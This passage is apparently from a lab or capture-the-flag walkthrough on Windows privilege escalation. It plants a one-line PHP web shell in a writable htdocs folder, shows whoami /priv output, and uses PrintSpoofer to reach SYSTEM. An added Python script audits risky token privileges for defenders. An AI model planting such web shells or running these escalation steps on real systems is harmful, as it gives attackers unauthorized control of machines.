Priv Escalation
There is also another user called apache. We also have write access to the htdocs folder, which means that we can attempt to get code execution as the apache user.
I created a PHP file in the htdocs folder where the other PHP files were.
<pre>
<?php
system($_GET['cmd']);
?>
</pre>
After getting another shell as the apache user, I enumerated the privileges of the apache user.
<pre>
C:\Users\apache>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
</pre>
I used PrintSpoofer to get Administrator.
<pre>
C:\Users\apache>PrintSpoofer.exe -i -c cmd.exe
PrintSpoofer.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
</pre>
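A defender-side check for the token privileges shown above, as an added example that is not part of the original write-up: it parses `whoami /priv` output collected from a service account and reports privileges that allow escalation to SYSTEM, including ones listed as Disabled. The `RISKY` set, the function names and the sample text are assumptions made for illustration.

```python
import re

# Assumption: illustrative set of privileges commonly abused to reach SYSTEM
# from a service account; extend it to match your own baseline.
RISKY = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege",
}
RULER = re.compile(r"=+(\s+=+)+")

def parse_whoami_priv(text):
    """Return [(name, description, state)]; name and state are single words."""
    lines = text.splitlines()
    start = next((i for i, l in enumerate(lines) if RULER.fullmatch(l.strip())), None)
    if start is None:
        raise ValueError("no column ruler found; not whoami /priv output")
    rows = []
    for line in lines[start + 1:]:
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se"):
            rows.append((parts[0], " ".join(parts[1:-1]), parts[-1]))
    return rows

def audit(text):
    """Return [(privilege, note)] for risky privileges held in the token."""
    findings = []
    for name, _desc, state in parse_whoami_priv(text):
        if name in RISKY:
            # A Disabled privilege is still in the token and the holder can
            # enable it, so presence matters more than the current state.
            note = "active" if state == "Enabled" else "present, can be enabled"
            findings.append((name, note))
    return findings

# Constructed sample: the listing from this page with collapsed whitespace.
SAMPLE = """PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

for name, note in audit(SAMPLE):
    print(f"[!] {name}: {note}")
```

Run against the web server's service account, any finding is a reason to review which account the service runs as and whether that account can write to the web root.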